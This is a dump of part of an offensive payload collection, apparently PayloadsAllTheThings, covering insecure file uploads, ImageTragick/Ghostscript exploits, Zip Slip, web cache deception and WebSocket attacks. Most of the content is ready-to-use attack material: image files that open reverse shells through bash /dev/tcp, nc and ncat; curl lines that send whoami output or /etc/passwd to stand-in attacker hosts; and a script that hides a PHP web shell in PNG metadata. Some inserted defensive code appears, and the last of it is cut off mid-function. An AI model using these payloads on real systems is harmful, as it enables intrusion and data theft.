/Upload Insecure Files/Extension PHP/shell.gif?shell.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpeg.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpg.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.jpg?shell.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.pgif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Extension PHP/shell.pgif
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phar:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php3:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php4:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php5:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.php7:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phpt:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.pht:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.phtml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.png.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Extension PHP/shell.png?shell.php:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Image Magik/README.md:
--------------------------------------------------------------------------------
# Image Tragik 1 & 2


## Exploit v1

Simple reverse shell

```powershell
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
```

## Exploit v2

Simple `id`
payload 22 | 23 | ```powershell 24 | %!PS 25 | userdict /setpagedevice undef 26 | save 27 | legal 28 | { null restore } stopped { pop } if 29 | { legal } stopped { pop } if 30 | restore 31 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops 32 | ``` 33 | 34 | then use `convert shellexec.jpeg whatever.gif` 35 | 36 | ## Thanks to 37 | 38 | * [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/convert_local_etc_passwd_html.svg: -------------------------------------------------------------------------------- 1 | 3 | xmlns="http://www.w3.org/2000/svg"> 4 | 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf: -------------------------------------------------------------------------------- 1 | %!PS 2 | currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) ) 3 | .putdeviceparams 4 | quit -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image 
Magik/imagemagik_ghostscript_reverse_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'pango:@/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'text:/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push graphic-context 6 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1' 7 | pop graphic-context 8 | pop graphic-context 9 | 10 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | encoding "UTF-8" 3 | viewbox 0 0 1 1 4 | affine 1 0 0 1 0 0 5 | push 
graphic-context 6 | image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0/tmp/gjdpez 2>&1; rm /tmp/gjdpez ' 7 | pop graphic-context 8 | pop graphic-context 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://localhost:PORT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg: 
-------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://IP_ATTAQUANT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 7 | 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context 
-------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops 9 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py: -------------------------------------------------------------------------------- 1 | from 
__future__ import print_function 2 | from PIL import Image 3 | 4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php 5 | # --- How to use : http://localhost/shell.php?c=echo%20'
';ls
 6 | 
 7 | #shellcode  = ""
 9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'
';ls
10 | shellcode2 = ";').($_^'/');?>"
11 | 
12 | 
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 | 
15 | # Create a backdoored PNG
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")
18 | im.info["shell"] = shellcode
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
20 | 
21 | # undocumented class
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()
24 | 
25 | # copy metadata into new object
26 | for k,v in im.info.items():
27 | 	if k in reserved: continue
28 | 	meta.add_text(k, v, 0)
29 | im.save("payload.png", "PNG", pnginfo=meta)
30 | 
31 | print("Done")


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Metadata/PHP_exif_system.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/GIF_exploit.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/GIF_exploit.gif


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/README.txt:
--------------------------------------------------------------------------------
# How to use
b.php?c=ls


Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Resize/exploit_PNG_110x110.php:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/exec.shtml:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/include.shtml:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/index.stm:
--------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/Upload Insecure Files/Zip Slip/README.md:
--------------------------------------------------------------------------------
# Zip Slip

> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim's machine.

## Summary

- [Detection](#detection)
- [Tools](#tools)
- [Exploits](#exploits)
  - [Basic Exploit](#basic-exploit)
- [Additional Notes](#additional-notes)

## Detection

- Any zip upload page on the application

## Tools

- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)

## Exploits

### Basic Exploit

```powershell
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
```
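The defensive counterpart to the archive above: an extractor that resolves every member path against the destination directory and rejects the archive before writing anything. This is an added example, not code from the page or from evilarc; the archives are constructed in memory, and the same path check applies unchanged to tar, jar or war member lists.

```python
"""Archive extraction that refuses Zip Slip entries before writing anything.

Added example, not code from the page or from evilarc. The archives are
constructed in memory; SLIP_ZIP carries the same kind of traversal name
(../../var/www/html/shell.php) that the evilarc command above produces."""
import io
import os
import zipfile


class ZipSlipError(Exception):
    """An archive member would land outside the destination directory."""


def safe_member_path(dest_dir, member_name):
    """Resolve where `member_name` would extract to and require it to stay under
    dest_dir. Absolute names, '..' components and backslash separators are all
    normalised before the check, so the decision is made on the final path."""
    dest_root = os.path.realpath(dest_dir)
    name = member_name.replace("\\", "/")
    if os.path.isabs(name):
        raise ZipSlipError("absolute path in archive: %r" % member_name)
    target = os.path.realpath(os.path.join(dest_root, name))
    if os.path.commonpath([dest_root, target]) != dest_root:
        raise ZipSlipError("path traversal in archive: %r" % member_name)
    return target


def check_archive(zip_bytes, dest_dir):
    """Return the offending member names (an empty list means the archive is safe)."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            try:
                safe_member_path(dest_dir, name)
            except ZipSlipError:
                bad.append(name)
    return bad


def extract_safely(zip_bytes, dest_dir):
    """Validate every member first, then extract; a malicious archive is rejected
    as a whole instead of leaving a half-written tree behind."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        targets = [(info, safe_member_path(dest_dir, info.filename))
                   for info in zf.infolist()]
        written = []
        for info, target in targets:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def build_archive(entries):
    """Build an in-memory zip from {name: bytes}. zipfile stores '../' names
    verbatim, which is why the extractor, not the archive, must enforce the boundary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample archives (placeholder contents, not real payloads)
BENIGN_ZIP = build_archive({"images/logo.png": b"not really a png"})
SLIP_ZIP = build_archive({
    "images/logo.png": b"decoy",
    "../../var/www/html/shell.php": b"placeholder",
})

if __name__ == "__main__":
    print(check_archive(BENIGN_ZIP, "/srv/uploads/extracted"))  # []
    print(check_archive(SLIP_ZIP, "/srv/uploads/extracted"))    # ['../../var/www/html/shell.php']
```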
28 | 
## Additional Notes

- For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability

## References

- [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability)
- [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability)



--------------------------------------------------------------------------------
/Web Cache Deception/README.md:
--------------------------------------------------------------------------------
# Web Cache Deception Attack

## Tools

* [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner)
    > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.

## Exploit

1. The browser requests `http://www.example.com/home.php/non-existent.css`.
2. The server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers instructing caches not to store this page.
3. The response goes through the proxy.
4. The proxy sees that the requested file has a `.css` extension.
5. Under the cache directory, the proxy creates a directory named home.php and caches the imposter "CSS" file (non-existent.css) inside.
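The flaw in step 4 is a cache rule keyed on the URL suffix. As an added example (not code from the page), the function below contrasts that rule with one that lets the origin's headers and Content-Type decide; the request path and origin responses are constructed to mirror the `home.php/non-existent.css` case, and the same header rule also refuses the `Cache-Control: public, no-cache` response shown under Methodology 2.

```python
"""Cache-storage decision for a reverse proxy: extension-based vs header-based.

Added example, not code from PayloadsAllTheThings. The request paths and origin
responses below are constructed to mirror the home.php/non-existent.css case."""
import posixpath

# Extensions a naive proxy treats as "static" and therefore cacheable
STATIC_EXTENSIONS = {".css", ".js", ".png", ".jpg", ".gif", ".woff2"}

# Content-Type a response must carry to be believed as that static type
EXPECTED_CONTENT_TYPE = {
    ".css": "text/css",
    ".js": "application/javascript",
    ".png": "image/png",
    ".jpg": "image/jpeg",
    ".gif": "image/gif",
    ".woff2": "font/woff2",
}


def naive_should_cache(path):
    """The flawed rule behind web cache deception: anything whose URL ends in a
    static-looking extension is stored, regardless of what the origin said."""
    return posixpath.splitext(path)[1].lower() in STATIC_EXTENSIONS


def parse_cache_control(value):
    """'public, max-age=60, no-cache' -> {'public': None, 'max-age': '60', 'no-cache': None}"""
    directives = {}
    for part in value.split(","):
        part = part.strip().lower()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip()] = arg.strip() or None
    return directives


def safe_should_cache(path, status, headers):
    """Hardened rule: the origin's response headers decide, never the URL suffix.

    Rejects non-200 responses, anything the origin marked private/no-store/no-cache,
    responses that set cookies (they are per-user), and responses whose Content-Type
    contradicts the extension (HTML served for a ".css" path is the deception signature)."""
    if status != 200:
        return False
    h = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(h.get("cache-control", ""))
    if cc.keys() & {"private", "no-store", "no-cache"}:
        return False
    if "set-cookie" in h:
        return False
    ext = posixpath.splitext(path)[1].lower()
    content_type = h.get("content-type", "").split(";")[0].strip().lower()
    if ext in EXPECTED_CONTENT_TYPE and content_type != EXPECTED_CONTENT_TYPE[ext]:
        return False
    return True


# Constructed origin responses
DECEPTION_RESPONSE = {  # what home.php returns for /home.php/non-existent.css
    "Content-Type": "text/html; charset=utf-8",
    "Cache-Control": "private, no-store",
    "Set-Cookie": "session=PLACEHOLDER; HttpOnly",
}
REAL_CSS_RESPONSE = {
    "Content-Type": "text/css",
    "Cache-Control": "public, max-age=86400",
}


def classify(path, status, headers):
    """Return (naive_decision, safe_decision) so the two rules can be compared."""
    return naive_should_cache(path), safe_should_cache(path, status, headers)


if __name__ == "__main__":
    print(classify("/home.php/non-existent.css", 200, DECEPTION_RESPONSE))  # (True, False)
    print(classify("/static/app.css", 200, REAL_CSS_RESPONSE))               # (True, True)
```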
15 | 
## Methodology of the attack - example

1. Normal browsing: visit the home page `https://www.example.com/myaccount/home/`
2. Open the malicious link: `https://www.example.com/myaccount/home/malicious.css`
3. The page is displayed as /home and the cache stores it
4. Open a private tab with the previous URL: `https://www.paypal.com/myaccount/home/malicious.css`
5. The cached page is displayed

Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
[![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093)

## Methodology 2

1. Find an unkeyed input for cache poisoning
    ```js
    Values: User-Agent
    Values: Cookie
    Header: X-Forwarded-Host
    Header: X-Host
    Header: X-Forwarded-Server
    Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host)
    Header: X-Original-URL (Symfony)
    Header: X-Rewrite-URL (Symfony)
    ```
2. Cache poisoning attack, example for an unkeyed `X-Forwarded-Host` input (use a cache buster so that only this test page is cached, not the main page of the website)
    ```js
    GET /test?buster=123 HTTP/1.1
    Host: target.com
    X-Forwarded-Host: test">

    HTTP/1.1 200 OK
    Cache-Control: public, no-cache
    [..]
    ">
    ```


## References

* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)
* [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle @albinowax](https://portswigger.net/research/web-cache-entanglement)
* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29)
* [Web cache poisoning - Web Security Academy learning materials](https://portswigger.net/web-security/web-cache-poisoning)
  - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws)
  - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws)



--------------------------------------------------------------------------------
/Web Sockets/Files/ws-harness.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import argparse
import os
import ssl
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

from websocket import create_connection  # pip install websocket-client

LOOP_BACK_PORT_NUMBER = 8000


def FuzzWebSocket(fuzz_value):
    # Substitute the [FUZZ] marker in the template, send it over the
    # already-open WebSocket and return the endpoint's reply
    print(fuzz_value)
    ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
    result = ws.recv()
    return result


def LoadMessage(file):
    # Read the message template from disk; abort if it cannot be read
    file_contents = ""
    try:
        if os.path.isfile(file):
            with open(file, 'r') as f:
                file_contents = f.read()
    except OSError:
        print("Error reading file: %s" % file)
        sys.exit(1)
    return file_contents


class myWebServer(BaseHTTPRequestHandler):

    # Handler for the GET requests: /?fuzz=<value>
    def do_GET(self):
        qs = parse_qs(self.path[2:])
        fuzz_value = qs.get('fuzz', [''])
        result = FuzzWebSocket(fuzz_value)
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        # ws.recv() returns str for text frames and bytes for binary frames;
        # the HTTP body must be bytes
        if isinstance(result, str):
            result = result.encode()
        self.wfile.write(result)


parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
parser.add_argument('-u', '--url', help='The remote WebSocket URL to target.', required=True)
parser.add_argument('-m', '--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.', required=True)
args = parser.parse_args()

ws_message = LoadMessage(args.message)

# Open one WebSocket connection that every fuzzed HTTP request reuses
ws = create_connection(args.url, sslopt={"cert_reqs": ssl.CERT_NONE}, header={}, http_proxy_host="", http_proxy_port=8080)

try:
    # Create a web server and define the handler to manage the
    # incoming request
    server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
    print('Started httpserver on port ', LOOP_BACK_PORT_NUMBER)

    # Wait forever for incoming http requests
    server.serve_forever()

except KeyboardInterrupt:
    print('^C received, shutting down the web server')
    server.socket.close()
    ws.close()



--------------------------------------------------------------------------------
/Web Sockets/Images/WebsocketHarness.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/WebsocketHarness.jpg


--------------------------------------------------------------------------------
/Web Sockets/Images/sqlmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/sqlmap.png


--------------------------------------------------------------------------------
/Web Sockets/Images/websocket-harness-start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/Web Sockets/Images/websocket-harness-start.png


--------------------------------------------------------------------------------
/Web Sockets/README.md:
--------------------------------------------------------------------------------
# Web Sockets Attacks

> The WebSocket protocol allows bidirectional, full-duplex communication between a client and a server.

## Summary

* [Tools](#tools)
* [Using ws-harness.py](#using-ws-harness-py)

## Tools

* [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)

## Using ws-harness.py

Start ws-harness against the target WebSocket endpoint and specify a message template to send to it.

```powershell
python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt
```

The content of the message should contain the **[FUZZ]** keyword.

```json
{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}
```

You can then point any tool at the newly created web service, which acts as a proxy and rewrites the content of the message sent through the websocket on the fly.

```powershell
sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump
```

## Cross-Site WebSocket Hijacking (CSWSH)

If the WebSocket handshake is not protected with a CSRF token or a nonce, an
attacker-controlled site can open the authenticated WebSocket of a victim,
because the browser automatically sends the victim's cookies with the
handshake. This attack is called Cross-Site WebSocket Hijacking (CSWSH).

Example exploit, hosted on an attacker's server, that exfiltrates the received
data from the WebSocket to the attacker:

```html
```

Adjust the code to your situation. For example, if the web application uses a
`Sec-WebSocket-Protocol` header in the handshake request, pass its value as the
second parameter of the `WebSocket` constructor so that the header is sent.
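What the server side has to do so that the handshake above fails: check the `Origin` header against an exact allow-list and require a per-session token that the browser does not send automatically. This is an added example, not code from the page; the allowed origin, the session store and the `token.<value>` subprotocol convention are constructed assumptions for the demo.

```python
"""Server-side handshake checks that defeat Cross-Site WebSocket Hijacking.

Added example, not from the page. The handshake headers, the session store and
the token-in-subprotocol convention are constructed assumptions for the demo."""
import hmac
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Origins allowed to open sockets against this application (assumed deployment value)
ALLOWED_ORIGINS = {"https://app.example.com"}

# Constructed session store: session id -> per-session CSRF token
SESSION_TOKENS = {"s3ss10n": "tok-7f3a9c"}

DEFAULT_PORTS = {"http": 80, "https": 443}


def normalize_origin(origin):
    """Lower-case scheme and host and drop default ports so comparisons are exact."""
    parts = urlsplit(origin)
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    port = parts.port
    if port is None or port == DEFAULT_PORTS[parts.scheme]:
        return "%s://%s" % (parts.scheme, parts.hostname)
    return "%s://%s:%d" % (parts.scheme, parts.hostname, port)


def origin_allowed(origin, allowed=ALLOWED_ORIGINS):
    """Exact-match allow-list; substring or prefix checks would accept attacker
    hosts such as app.example.com.attacker.example."""
    if not origin:
        return False  # browsers always send Origin on WebSocket handshakes
    return normalize_origin(origin) in allowed


def presented_token(target, headers):
    """The client may carry its CSRF token as ?token= in the request target or as
    a 'token.<value>' entry in Sec-WebSocket-Protocol (both conventions assumed)."""
    qs = parse_qs(urlsplit(target).query)
    if qs.get("token"):
        return qs["token"][0]
    for proto in headers.get("sec-websocket-protocol", "").split(","):
        proto = proto.strip()
        if proto.startswith("token."):
            return proto[len("token."):]
    return None


def validate_handshake(target, headers):
    """Return (accepted, reason) for an HTTP Upgrade request.

    The Origin check runs first: a foreign Origin with a valid session cookie is
    the CSWSH signature and is worth alerting on even if the token is also wrong."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("upgrade", "").lower() != "websocket":
        return False, "not a websocket upgrade"
    if not origin_allowed(h.get("origin")):
        return False, "origin not allowed"
    cookies = SimpleCookie()
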